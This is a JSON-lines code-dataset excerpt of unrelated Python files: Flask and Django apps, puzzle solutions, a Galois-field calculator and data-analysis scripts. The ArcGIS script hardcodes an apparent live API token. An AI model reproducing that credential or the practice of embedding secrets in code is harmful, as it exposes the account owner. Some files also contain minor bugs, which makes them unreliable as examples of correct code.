index():\n session['page'] = 'main.index'\n form = AddressForm()\n if form.validate_on_submit():\n try:\n address = form.address.data + ' Seattle, WA'\n address_lat, address_lon = address_lat_lon(address)\n session['address'] = [float(address_lat), float(address_lon)]\n except IndexError:\n error = \"That is not a valid address\"\n return render_template('index.html', form=form, error=error, active='home')\n print(session)\n try:\n if session['address']:\n data_911 = get_data(endpoints.get('emergency'), last_3days_911)\n data_crime = get_data(endpoints.get('crime'), last_3days_crime)\n data_build = get_data(endpoints.get('build'), last_3k_build)\n data_landuse = get_data(endpoints.get('landuse'))\n data_violations = get_data(endpoints.get('violations', last_60days_violations))\n m1 = create_map('Home', 'All Incidents', data_911, create_marker_text_911, incident_type_911,\n location=session['address'], zoom_start=15)\n m2 = create_map('Home', 'All Incidents', data_crime, create_marker_text_crime, incident_type_crime,\n location=session['address'], zoom_start=15)\n m3 = create_map('Home', 'All Incidents', data_build, create_marker_text_build, incident_type_build,\n location=session['address'], zoom_start=15)\n m4 = create_map('Home', 'All Incidents', data_landuse, create_marker_landuse, incident_type_landuse,\n location=session['address'], zoom_start=15)\n m5 = create_map('Home', 'All Incidents', data_violations, create_marker_violations,\n incident_type_violations,\n location=session['address'], zoom_start=15)\n return render_template('index.html', form=form, map1=m1, map2=m2, map3=m3, map4=m4, map5=m5, active='home')\n except KeyError:\n return render_template('index.html', form=form, active='home')\n\n\n@main_blueprint.route('/emergency', methods=['GET', 'POST'])\ndef emergency():\n data_911 = get_data(endpoints.get('emergency', last_3days_911))\n session['page'] = 'main.emergency'\n form = Map911Form()\n generate_911_sunburst(data_911)\n if form.submit.data and form.validate():\n m = create_map(form.neighborhood.data, form.incident.data, data_911, create_marker_text_911,\n incident_type_911)\n m2 = generate_heatmap('Entire City', 'All Incidents', data_911, incident_type_911)\n return render_template('emergency.html', form=form, map=m, map2=m2, active='emergency')\n m = create_map('Entire City', 'All Incidents', data_911, create_marker_text_911, incident_type_911)\n m2 = generate_heatmap('Entire City', 'All Incidents', data_911, incident_type_911)\n return render_template('emergency.html', form=form, map=m, map2=m2, active='emergency')\n\n\n@main_blueprint.route('/crime', methods=['GET', 'POST'])\ndef crime():\n data_crime = get_data(endpoints.get('crime', last_3days_crime))\n session['page'] = 'main.crime'\n form = MapCrimeForm()\n generate_crime_sunburst(data_crime)\n if form.submit.data and form.validate():\n m = create_map(form.neighborhood.data, form.incident_crime.data, data_crime, create_marker_text_crime,\n incident_type_crime)\n m2 = generate_heatmap('Entire City', 'All Incidents', data_crime, incident_type_911)\n return render_template('crime.html', form=form, map=m, map2=m2, active='crime')\n m = create_map('Entire City', 'All Incidents', data_crime, create_marker_text_crime, incident_type_crime)\n m2 = generate_heatmap('Entire City', 'All Incidents', data_crime, incident_type_crime)\n return render_template('crime.html', form=form, map=m, map2=m2, active='crime')\n\n\n@main_blueprint.route('/violations', methods=['GET', 'POST'])\ndef violations():\n data_violations = get_data(endpoints.get('violations', last_60days_violations))\n session['page'] = 'main.violations'\n form = ViolationsBuildForm()\n if form.submit.data and form.validate():\n m = create_map(form.neighborhood.data, 'All Incidents', data_violations, create_marker_violations,\n incident_type_violations)\n return render_template('violations.html', form=form, map=m, active='violations')\n m = create_map('Entire City', 'All Incidents', data_violations, create_marker_violations,\n incident_type_violations)\n return render_template('violations.html', form=form, map=m, active='violations')\n\n\n@main_blueprint.route('/build', methods=['GET', 'POST'])\ndef build():\n data_build = get_data(endpoints.get('build'), last_3k_build)\n data_landuse = get_data(endpoints.get('landuse'))\n session['page'] = 'main.build'\n form = MapBuildForm()\n generate_build_sunburst(data_build)\n if form.submit.data and form.validate():\n m = create_map(form.neighborhood.data, form.incident_build.data, data_build, create_marker_text_build,\n incident_type_build)\n m3 = create_map(form.neighborhood.data, 'All Incidents', data_landuse, create_marker_landuse,\n incident_type_landuse)\n m2 = generate_heatmap('Entire City', 'All Incidents', data_build, incident_type_build)\n return render_template('build.html', form=form, map=m, map2=m2, map3=m3, active='build')\n m = create_map('Entire City', 'All Incidents', data_build, create_marker_text_build, incident_type_build)\n m3 = create_map('Entire City', 'All Incidents', data_landuse, create_marker_landuse,\n incident_type_landuse)\n m2 = generate_heatmap('Entire City', 'All Incidents', data_build, incident_type_build)\n return render_template('build.html', form=form, map=m, map2=m2, map3=m3, active='build')\n","repo_name":"noele952/seattle-data-final","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13628660854","text":"from distutils.command.upload import upload\r\nfrom django.db import models\r\nfrom .validators import validate_file_size\r\n\r\n\r\n\r\n# Create your models here.\r\nclass Profile(models.Model):\r\n name = models.TextField(\r\n verbose_name='Название'\r\n )\r\n description = models.TextField(\r\n verbose_name='Описание', max_length=140\r\n )\r\n get_image = models.ImageField(\r\n verbose_name='Изображение',upload_to='pictures/%Y/%m/%d/',\r\n validators=[validate_file_size] \r\n )\r\n price = models.PositiveIntegerField(\r\n verbose_name='Цена'\r\n )\r\n\r\n def __str__(self):\r\n return f'#{self.name}'\r\n\r\n class Meta:\r\n verbose_name = 'Блюдо'\r\n verbose_name_plural = 'Блюда'\r\n","repo_name":"Nuggetsik/bot_telegram","sub_path":"admin_backend/tga/ugc/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4990406608","text":"import re\nimport functools\nfrom common import Input\nimport itertools\n\n\ndef parse_instructions(instruction_set, instructions):\n parsed = []\n for line in instructions:\n m = re.match(r'(\\w\\w\\w) (-?\\d+|\\w) ?(-?\\d+|\\w)?$', line)\n if not m:\n print(line)\n inst, *args = m.groups()\n args = [a for a in args if a is not None]\n if inst not in instruction_set:\n raise ValueError('instruction {} not found'.format(inst))\n parsed.append([inst, args])\n return parsed\n\n\ndef execute(register, instruction_set, instructions):\n instructions = parse_instructions(instruction_set, instructions)\n while register['i'] < len(instructions):\n # print(register)\n inst, args = instructions[register['i']]\n # print(inst, *args)\n try:\n if inst == 'tgl':\n instruction_set[inst](*args, instructions, register['i'])\n elif inst == 'out':\n yield from instruction_set[inst](*args)\n else:\n instruction_set[inst](*args)\n except TypeError:\n pass\n register['i'] += 1\n return register\n\n\ndef resolve(reg):\n try:\n return int(reg)\n except ValueError:\n return register[reg]\n\n\ndef verify(output, registers):\n verification_data = itertools.cycle((0, 1))\n recording = set()\n for i, (v, o) in enumerate(zip(verification_data, output)):\n if v != o:\n return False\n state = (serialize(registers), o)\n if state in recording and len(recording) >= 10:\n return True\n recording.add(state)\n return False\n\n\ndef serialize(registers):\n return tuple(registers.items())\n\n\nif __name__ == '__main__':\n\n def cpy(x, y):\n register[y] = resolve(x)\n\n def inc(x):\n register[x] += 1\n\n def dec(x):\n register[x] -= 1\n\n def jnz(x, y):\n register['i'] += resolve(y) - 1 if resolve(x) != 0 else 0\n\n def tgl(x, instructions, self_index):\n index = register['i'] + resolve(x)\n inst, args = instructions[index]\n\n if inst == 'inc':\n inst = 'dec'\n elif len(args) == 1:\n inst = 'inc'\n\n if inst == 'jnz':\n inst = 'cpy'\n elif len(args) == 2:\n inst = 'jnz'\n # print(instructions[index], ' at ', index, ' changed to ', [inst, args])\n instructions[index] = [inst, args]\n\n def out(x):\n yield resolve(x)\n\n instruction_set = {\n 'cpy': cpy,\n 'inc': inc,\n 'dec': dec,\n 'jnz': jnz,\n 'tgl': tgl,\n 'out': out,\n }\n\n a = 0\n while True:\n register = {\n 'a': a,\n 'b': 0,\n 'c': 0,\n 'd': 0,\n 'i': 0,\n }\n\n if verify(execute(register, instruction_set, Input(25)), register):\n print('DONE: ', a)\n break\n a += 1\n","repo_name":"Laharah/advent_of_code","sub_path":"2016/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17367629140","text":"# Leetcode\n# 227. Basic Calculator II\n# https://leetcode.com/problems/basic-calculator-ii/solutions/3227668/227-time-91-15-solution-with-step-by-step-explanation/\n\n\nclass Solution:\n def calculate(self, s: str) -> int:\n stack = []\n operator = \"+\"\n current = 0\n for char in s+\"+\": # adding the + in the end because the last num in s will be added when an operator is found.\n if char.isdigit():\n current = current*10+int(char) # for consecutive digits. For eg. 98 => 9x10 + 8 = 98\n elif char in [\"+\", \"-\", \"*\", \"/\"]:\n if operator == \"+\":\n stack.append(current)\n elif operator == \"-\":\n stack.append(-current)\n elif operator == \"*\":\n stack.append(stack.pop() * current)\n elif operator == \"/\":\n stack.append(int(stack.pop()/current))\n operator = char\n current = 0\n return sum(stack)\n","repo_name":"ayeshsalah/coding-interview-prep","sub_path":"leetcode/227_BasicCalculatorII.py","file_name":"227_BasicCalculatorII.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1441188242","text":"#Script to connect to an ArcGIS Server and get the list of services\n#and their properties\n\nimport sys\nimport arcgis\n\n#Connect to the ArcGIS Server\nprint(\"Connecting to ArcGIS Server...\")\napi_token = 'AAPKc1d344f69e094823862ef2f539973a3a2IW8P-P5JdXF1-4JsmVMr3XpfuefE7HOTc8Ju6DjIK2yKKowGhUH8Y1Pw1dwWaMU'\n\ngis = arcgis.GIS(\"https://www.arcgis.com\", api_token)\n\n#Connect to franklin county gis server\ngis = arcgis.GIS(\"https://gis.franklincountyohio.gov/arcgis/rest/services\", api_token)\n\n#Get the list of services\nservices = gis.services\nprint(services)\n","repo_name":"MattchewMoar/homepage","sub_path":"home/static/home/scripts/gis.py","file_name":"gis.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24906636678","text":"import json\nfrom datetime import datetime, timedelta\nfrom typing import Any, NamedTuple\n\nimport pandas as pd\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Case, Q, QuerySet, Value, When\nfrom reversion.models import Version\n\nfrom ..common.helper import HAWCDjangoJSONEncoder, map_enum\nfrom ..common.models import BaseManager, replace_null, str_m2m\nfrom . import constants\n\n\ndef published(prefix: str = \"\") -> Case:\n public = f\"{prefix}public_on__isnull\"\n hidden = f\"{prefix}hide_from_public_page\"\n return Case(\n When(**{public: True}, then=Value(constants.PublishedStatus.PRIVATE)),\n When(\n Q(**{public: False}) & Q(**{hidden: False}),\n then=Value(constants.PublishedStatus.PUBLIC),\n ),\n When(\n Q(**{public: False}) & Q(**{hidden: True}),\n then=Value(constants.PublishedStatus.UNLISTED),\n ),\n default=Value(\"???\"),\n )\n\n\nclass AssessmentQuerySet(QuerySet):\n def public(self):\n return self.filter(public_on__isnull=False, hide_from_public_page=False)\n\n def user_can_view(self, user, exclusion_id=None, public=False):\n \"\"\"\n Return queryset of all assessments which that user is able to view,\n optionally excluding assessment exclusion_id,\n not including public assessments\n \"\"\"\n filters = (\n Q(project_manager=user) | Q(team_members=user) | Q(reviewers=user)\n if user.is_authenticated\n else Q(pk__in=[])\n )\n if public:\n filters |= Q(public_on__isnull=False) & Q(hide_from_public_page=False)\n return self.filter(filters).exclude(id=exclusion_id).distinct()\n\n def recent_public(self, n: int = 5) -> QuerySet:\n \"\"\"Get recent public, published assessments\n\n Args:\n n (int, optional): Number of assessments; defaults to 5.\n\n Returns:\n models.QuerySet: An assessment queryset\n \"\"\"\n return self.filter(public_on__isnull=False, hide_from_public_page=False).order_by(\n \"-public_on\"\n )[:n]\n\n def with_published(self) -> QuerySet:\n return self.annotate(published=published())\n\n def with_role(self, user) -> QuerySet:\n return self.annotate(\n user_role=Case(\n When(project_manager=user, then=Value(constants.AssessmentRole.PROJECT_MANAGER)),\n When(team_members=user, then=Value(constants.AssessmentRole.TEAM_MEMBER)),\n When(reviewers=user, then=Value(constants.AssessmentRole.REVIEWER)),\n default=Value(constants.AssessmentRole.NO_ROLE),\n )\n )\n\n def global_chemical_report(self) -> pd.DataFrame:\n mapping = {\n \"id\": \"id\",\n \"name\": \"name\",\n \"year\": \"year\",\n \"assessment_objective\": \"assessment_objective\",\n \"creator_email\": replace_null(\"creator__email\"),\n \"cas\": \"cas\",\n \"dtxsids\": \"dtxsids_str\",\n \"published\": \"published\",\n \"public_on\": \"public_on\",\n \"hide_from_public_page\": \"hide_from_public_page\",\n \"created\": \"created\",\n \"last_updated\": \"last_updated\",\n }\n data = (\n self.with_published()\n .annotate(dtxsids_str=str_m2m(\"dtxsids__dtxsid\"))\n .values_list(*list(mapping.values()))\n )\n return pd.DataFrame(data=data, columns=list(mapping.keys()))\n\n\nclass AssessmentManager(BaseManager):\n assessment_relation = \"id\"\n\n def get_queryset(self):\n return AssessmentQuerySet(self.model, using=self._db)\n\n\nclass AttachmentManager(BaseManager):\n def get_attachments(self, obj, public_only: bool):\n filters = {\n \"content_type\": ContentType.objects.get_for_model(obj),\n \"object_id\": obj.id,\n }\n if public_only:\n filters[\"publicly_available\"] = True\n return self.filter(**filters)\n\n def assessment_qs(self, assessment_id):\n a = ContentType.objects.get(app_label=\"assessment\", model=\"assessment\").id\n return self.filter(content_type=a, object_id=assessment_id)\n\n\nclass DoseUnitManager(BaseManager):\n def assessment_qs(self, assessment_id):\n return self.all()\n\n def json_all(self):\n return json.dumps(list(self.all().values()), cls=HAWCDjangoJSONEncoder)\n\n def get_animal_units(self, assessment):\n \"\"\"\n Returns a queryset of all bioassay DoseUnits used in an assessment.\n \"\"\"\n return (\n self.filter(\n dosegroup__dose_regime__dosed_animals__experiment__study__assessment=assessment\n )\n .order_by(\"pk\")\n .distinct(\"pk\")\n )\n\n def get_animal_units_names(self, assessment):\n \"\"\"\n Returns a list of the dose-units which are used in the selected\n assessment for animal bioassay data.\n \"\"\"\n return self.get_animal_units(assessment).values_list(\"name\", flat=True)\n\n def get_iv_units(self, assessment_id: int):\n return (\n self.filter(ivexperiments__study__assessment=assessment_id)\n .order_by(\"id\")\n .distinct(\"id\")\n )\n\n def get_epi_units(self, assessment_id: int):\n return (\n self.filter(exposure__study_population__study__assessment_id=assessment_id)\n .order_by(\"pk\")\n .distinct(\"pk\")\n )\n\n\nclass SpeciesManager(BaseManager):\n def assessment_qs(self, assessment_id):\n return self.all()\n\n\nclass StrainManager(BaseManager):\n def assessment_qs(self, assessment_id):\n return self.all()\n\n\nclass EffectTagManager(BaseManager):\n assessment_relation = \"baseendpoint__assessment\"\n\n def assessment_qs(self, assessment_id):\n return self.filter(baseendpoint__assessment_id=assessment_id).distinct()\n\n def get_choices(self, assessment_id):\n return self.get_qs(assessment_id).values_list(\"id\", \"name\").order_by(\"name\")\n\n\nclass BaseEndpointManager(BaseManager):\n assessment_relation = \"assessment\"\n\n\nclass TimeSpentEditingManager(BaseManager):\n assessment_relation = \"assessment\"\n\n\nclass DatasetManager(BaseManager):\n assessment_relation = \"assessment\"\n\n\nclass AssessmentValueManager(BaseManager):\n assessment_relation = \"assessment\"\n\n def get_df(self) -> pd.DataFrame:\n \"\"\"Get a dataframe of Assessment Values from given Queryset of Values.\"\"\"\n mapping: dict[str, str] = {\n \"assessment_id\": \"assessment_id\",\n \"assessment__name\": \"assessment_name\",\n \"assessment__created\": \"assessment_created\",\n \"assessment__last_updated\": \"assessment_last_updated\",\n \"assessment__details__project_type\": \"project_type\",\n \"assessment__details__project_status\": \"project_status\",\n \"assessment__details__project_url\": \"project_url\",\n \"assessment__details__peer_review_status\": \"peer_review_status\",\n \"assessment__details__qa_id\": \"qa_id\",\n \"assessment__details__qa_url\": \"qa_url\",\n \"assessment__details__report_id\": \"report_id\",\n \"assessment__details__report_url\": \"report_url\",\n \"assessment__details__extra\": \"assessment_extra\",\n \"evaluation_type\": \"evaluation_type\",\n \"id\": \"value_id\",\n \"system\": \"system\",\n \"value_type\": \"value_type\",\n \"value\": \"value\",\n \"value_unit\": \"value_unit\",\n \"basis\": \"basis\",\n \"pod_value\": \"pod_value\",\n \"pod_unit\": \"pod_unit\",\n \"species_studied\": \"species_studied\",\n \"duration\": \"duration\",\n \"study_id\": \"study_id\",\n \"study__short_citation\": \"study_citation\",\n \"confidence\": \"confidence\",\n \"uncertainty\": \"uncertainty\",\n \"tumor_type\": \"tumor_type\",\n \"extrapolation_method\": \"extrapolation_method\",\n \"evidence\": \"evidence\",\n \"comments\": \"comments\",\n \"extra\": \"extra\",\n }\n data = self.select_related(\"assessment__details\").values_list(*list(mapping.keys()))\n df = pd.DataFrame(data=data, columns=list(mapping.values())).sort_values(\n [\"assessment_id\", \"value_id\"]\n )\n map_enum(df, \"project_status\", constants.Status, replace=True)\n map_enum(df, \"peer_review_status\", constants.PeerReviewType, replace=True)\n map_enum(df, \"evaluation_type\", constants.EvaluationType, replace=True)\n map_enum(df, \"value_type\", constants.ValueType, replace=True)\n map_enum(df, \"confidence\", constants.Confidence, replace=True)\n return df\n\n\nclass AssessmentDetailManager(BaseManager):\n assessment_relation = \"assessment\"\n\n\nclass Event(NamedTuple):\n \"\"\"A potentially collapsed changed event between Logs and Reversions\"\"\"\n\n message: str\n snapshot: str\n user: Any\n created: datetime\n\n\nclass EventPair:\n \"\"\"An Event Pair Comparison between a Log and Reversion\"\"\"\n\n def __init__(self, item_1, item_2=None):\n \"\"\"Build an event pair, or at least one event.\n\n Args:\n item_1 (Union[Log, Version]): The first item in the pair\n item_2 (Union[Log, Version], optional): The optional second item in the pair\n \"\"\"\n self.log = None\n self.version = None\n if isinstance(item_1, Version):\n self.version = item_1\n else:\n self.log = item_1\n if item_2:\n if isinstance(item_2, Version):\n self.version = item_2\n else:\n self.log = item_2\n\n def collapsable(self) -> bool:\n # should the two items be collapsed?\n if self.log is None or self.version is None:\n return False\n return abs(self.log.created - self.version.revision.date_created) < timedelta(seconds=10)\n\n def output(self) -> Event:\n # Return a collapsed event\n return Event(\n message=self.log.message if self.log else \"\",\n snapshot=self.version.serialized_data if self.version else \"\",\n user=self.log.user if self.log else self.version.revision.user,\n created=self.log.created if self.log else self.version.revision.date_created,\n )\n\n\nclass LogManager(BaseManager):\n assessment_relation = \"assessment\"\n\n def get_object_audit(self, content_type: ContentType | int, object_id: int) -> list[Event]:\n \"\"\"\n Combines information from HAWC's internal logs and reversion logs for a more complete audit.\n Matching is attempted between these two log types to account for same operations.\n\n Args:\n content_type (Union[ContentType, int]): Content type of interested object.\n object_id (int): ID of interested object.\n\n Returns:\n list[Event]: Serialized logs with message, snapshot, user, and date created.\n \"\"\"\n # sort all events in descending order\n logs = (\n self.filter(content_type=content_type, object_id=object_id)\n .select_related(\"user\")\n .order_by(\"id\")\n )\n versions = (\n Version.objects.filter(content_type=content_type, object_id=object_id)\n .select_related(\"revision__user\")\n .order_by(\"id\")\n )\n events = list(logs) + list(versions)\n events.sort(\n key=lambda el: el.created if isinstance(el, self.model) else el.revision.date_created,\n reverse=True,\n )\n\n # build event aggregations\n aggregations = []\n used_next_event = None\n for i, this_event in enumerate(events):\n # skip current item if we've already used it\n if this_event is used_next_event:\n continue\n\n # try to get next event to compare; if we dont have one, add the current\n try:\n next_event = events[i + 1]\n except IndexError:\n aggregations.append(EventPair(this_event).output())\n break\n\n # run pair comparisons\n pair = EventPair(this_event, next_event)\n if pair.collapsable():\n # add both; mark second as consumed\n aggregations.append(pair.output())\n used_next_event = next_event\n else:\n # just add one\n aggregations.append(EventPair(this_event).output())\n\n return aggregations\n","repo_name":"shapiromatron/hawc","sub_path":"hawc/apps/assessment/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":12495,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"73829273193","text":"import tools\nfrom IrreduciblePreloader import IrreduciblePreloader\nfrom PolyGalois2m import PolyGalois2m\n\n\nclass FrontToBackConnector:\n myPreloader = None\n myGUI = None\n\n def __init__(self, connector):\n \"\"\"\n Instantiates preloader and sends the self to the Launcher, so a link can be established.\n :param connector: Empty list used to return the self\n \"\"\"\n connector.append(self)\n self.myPreloader = IrreduciblePreloader()\n\n def checkIfSupported(self, m):\n \"\"\"\n Checks if the m provided corresponds to a supported GF(2^m)\n :param m: int\n :return: bool accordingly\n \"\"\"\n if m in self.myPreloader.dict:\n return True, self.myPreloader.dict[m]\n else:\n return False\n\n def treatEntry(self, entry):\n \"\"\"\n Takes an input from user in string form, could be bin or hex,\n converts it to binary list\n :param entry:\n :return: List of 0 and 1 coefficients, representing the equivalent polynomial inputted\n \"\"\"\n if entry[0] == 16:\n entry[1] = tools.hexToBin(entry[1])\n else:\n entry[1] = list(entry[1])\n entry[1] = tools.charListToIntList(entry[1])\n return entry[1]\n\n def calculate(self, mode, filledFields, m):\n \"\"\"\n Relays user input to backend in a suitable format\n :param mode: int representing the operation requested by user\n :param filledFields: list of tuples, each of which describes an input field value and base\n :param m: int for the m(2^m)\n \"\"\"\n treatedEntries = []\n for i in range(len(filledFields)):\n treatedEntries.append(self.treatEntry(filledFields[i]))\n irreducibleCoeffs = self.myPreloader.dict[m]\n polynomials = [PolyGalois2m(coeffs, m, irreducibleCoeffs) for coeffs in treatedEntries]\n irreducibleSt = tools.stringifyBinList(irreducibleCoeffs)\n\n # Adding two polynomials\n if mode == 0:\n result = polynomials[0] + polynomials[1]\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n # Substracting two polynomials\n elif mode == 1:\n result = polynomials[0] - polynomials[1]\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n # Multiplying two polynomials\n elif mode == 2:\n result = polynomials[0] * polynomials[1]\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n # Dividing two polynomials\n elif mode == 3:\n result = polynomials[0] / polynomials[1]\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n # Inverting a polynomial\n elif mode == 4:\n result = polynomials[0].findInverse()\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n # Moduloing a polynomial\n elif mode == 5:\n result = polynomials[0]\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n","repo_name":"anthonyjsaab/Galois-Calculator","sub_path":"src/FrontToBackConnector.py","file_name":"FrontToBackConnector.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15145562619","text":"y, m, d = map(int, input().split('/'))\r\n\r\ndef leap_year(y):\r\n if y % 400 == 0:\r\n return True\r\n if y % 100 == 0:\r\n return False\r\n if y % 4 == 0:\r\n return True\r\n return False\r\n\r\nlims = {1: 31, 2: 28, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}\r\n\r\nwhile m <= 12:\r\n lim = lims[m]\r\n if leap_year(y) and m == 2:\r\n lim += 1\r\n while d <= lim:\r\n if y % (m * d) == 0:\r\n print(\"{year:02d}/{month:02d}/{date:02d}\".format(year=y, month=m, date=d))\r\n exit()\r\n d += 1\r\n d = 1\r\n m += 1\r\nprint(\"{year:02d}/{month:02d}/{date:02d}\".format(year=y+1, month=1, date=1))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc002/B/4818502.py","file_name":"4818502.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"42112616334","text":"\nwhile True:\n direita = 0\n esquerda = 0\n direcao = 0\n\n nComandos = int(input(\"Insira a quantidade de comandos dada pelo sargento: \"))\n \n if nComandos == 0:\n break\n\n ordem = input('Informe os comandos: ').upper()\n \n for i in ordem:\n if i == 'D':\n direita += 1\n if i == 'E':\n esquerda += 1\n\n direcao = direita - esquerda\n direcao = direcao % 4\n\n if direcao == 0:\n print('N')\n elif direcao == 1:\n print('L')\n elif direcao == 2:\n print('S')\n elif direcao == 3:\n print('O')\n \n\n#print('d',direita)\n#print('e',esquerda)\n\n","repo_name":"medeirosJose/UFSC","sub_path":"2023.1/INE5603 - Introdução à POO/Lista 07 - Strings/Exercício1.py","file_name":"Exercício1.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36780944970","text":"import sys\nfrom rec_utils import *\n\n\ndef main():\n \"\"\" factor, fr, counts_thr, area_list, subject, area, mode, mode_seed, [overwrite] \"\"\"\n args_version = sys.argv[1:]\n # args_version = ['job_id=0', 'overwrite=True']\n version = job_scheduler(args_version, args_from_parse_func)\n\n # create analysis object\n dpca = DemixedPrincipalComponent(DataBase(['units', 'events', 'conditions']), version)\n db, md = dpca.db, dpca.db.md\n\n # overwrite check\n target_filename = dpca.get_path_base('pbt', dpca.get_exec_stem())\n print(target_filename)\n if path.exists(target_filename) and ('overwrite' not in version.keys() or not eval(version['overwrite'])):\n exit()\n\n # load behavioral units from filter\n behavioral_units_filter = md.np_loader(dpca.get_path_base('filter', dpca.get_filter_stem()))\n\n # init params\n units_index = md.preproc_imports['units']['index']\n events_index = md.preproc_imports['events']['index']\n mode_seed = int(dpca.version['mode_seed'])\n area = dpca.version['area']\n v_factor_params = factor_generate_conditions(dpca.version['factor'])\n assembly_condition_columns = v_factor_params['condition_columns']\n balance_condition_columns = v_factor_params['balance_columns']\n counts_thr = int(dpca.version['counts_thr'])\n\n # process\n # get behavioral unit indices\n buf_units = list(set(zip_columns(behavioral_units_filter, units_index)))\n # filter units table with behavioral units\n db.tables['units'] = db.tables['units'].loc[buf_units]\n units = db.tables['units']\n\n if dpca.version['mode'] == 'AreaShuffle':\n # shuffle area labels and take shuffled area units indices\n units['AreaShuffle'] = list(units['Area'].sample(frac=1, random_state=mode_seed)) if mode_seed else units['Area']\n area_units = units.loc[units['AreaShuffle'].eq(area)].index\n elif dpca.version['mode'] == 'Bootstrap':\n # get min size of areas, calculate fraction to subsample, get area units indices subsampled (constant seed)\n area_counts = units['Area'].value_counts()\n min_size = area_counts.loc[list_param_to_list(dpca.version['area_list'])].min()\n area_units = units.loc[units['Area'].eq(area)].sample(min_size, random_state=0).index\n elif dpca.version['mode'] == 'Full':\n area_units = units.loc[units['Area'].eq(area)].index\n\n # TODO: modifications for replacement sampling of units, correct later\n area_units_df = pd.DataFrame(area_units, columns=['Unit'])\n area_units_df = unzip_columns(area_units_df, 'Unit', units_index)\n area_units_df['Unit_Code'] = area_units_df.index\n\n # isolate behavioral units of area selection\n area_behavioral_units = pd.merge(behavioral_units_filter, area_units_df, on=units_index)\n # merge with condition columns\n events_conditions = db.tables['events_conditions'][assembly_condition_columns].reset_index()\n area_behavioral_units_conditions = pd.merge(area_behavioral_units, events_conditions, on=events_index)\n # groupby units x conditions\n area_conditions_grouper = area_behavioral_units_conditions.groupby(units_index + ['Unit_Code'] + assembly_condition_columns)\n # sample counts_thr events for every unit x condition (replace for Bootstrap)\n behavioral_units = area_conditions_grouper.sample(counts_thr,\n random_state=mode_seed,\n replace=dpca.version['mode'] == 'Bootstrap')\n\n condition_columns = [col for col in assembly_condition_columns if not col in balance_condition_columns]\n behavioral_units.drop(balance_condition_columns, axis=1, inplace=True)\n pbt = pbt_from_behavioral_units(condition_columns, version['fr'], behavioral_units, db)\n\n md.np_saver(pbt, target_filename)\n\n\ndef args_from_parse_func(parse_version):\n\n args_version_list = []\n\n # for area_list, area in [('PFC', 'PFC'), ('Stri', 'Stri'), ('IT', 'IT')]:\n # for subject in ['Gonzo', 'Oscar', 'Gonzo_Oscar']:\n # for factor, counts_thr in [('GatedStimulusPostDistMemory', '6'), ('GatedStimulusPostDistMemory', '8'),\n # ('GatedStimulusPostDistMemory', '10'), ('GatedStimulusPostDistMemory', '12')]:\n # args_factor = ['factor={0:s}'.format(factor)]\n # args_fr = ['fr=ConcatFactor2']\n # args_counts_thr = ['counts_thr={0:s}'.format(counts_thr)]\n # args_area_list = ['area_list={0:s}'.format(area_list)]\n # args_subject = ['subject={0:s}'.format(subject)]\n # args_area = ['area={0:s}'.format(area)]\n # args_mode = ['mode=Full']\n # args_mode_seed = ['mode_seed={0:d}'.format(ii) for ii in range(1)]\n # args_version_list.extend(list(map(list, list(product(args_factor, args_fr, args_counts_thr, args_area_list,\n # args_subject, args_area, args_mode, args_mode_seed)))))\n\n for area_list, area in [('PFC', 'PFC'), ('Stri', 'Stri'), ('IT', 'IT')]:\n for subject in ['Gonzo', 'Oscar', 'Gonzo_Oscar']:\n for counts_thr in ['10', '12']:\n # for factor in ['GatPostStimulusRuleStim', 'TargPostStimulusRuleStim',\n # 'GatingPreBool', 'StimulusGating', 'StimulusGatingPreBool']:\n for factor in ['StimulusGatingNoTarget']:\n args_factor = ['factor={0:s}'.format(factor)]\n args_fr = ['fr=ConcatFactor2']\n args_counts_thr = ['counts_thr={0:s}'.format(counts_thr)]\n args_area_list = ['area_list={0:s}'.format(area_list)]\n args_subject = ['subject={0:s}'.format(subject)]\n args_area = ['area={0:s}'.format(area)]\n args_mode = ['mode=Full']\n args_mode_seed = ['mode_seed={0:d}'.format(ii) for ii in range(20)]\n args_version_list.extend(list(map(list, list(product(args_factor, args_fr, args_counts_thr, args_area_list,\n args_subject, args_area, args_mode, args_mode_seed)))))\n\n args_version_from_job = args_version_list[int(parse_version['job_id'])]\n if 'overwrite' in parse_version.keys():\n args_version_from_job.append('overwrite={0:s}'.format(parse_version['overwrite']))\n\n return 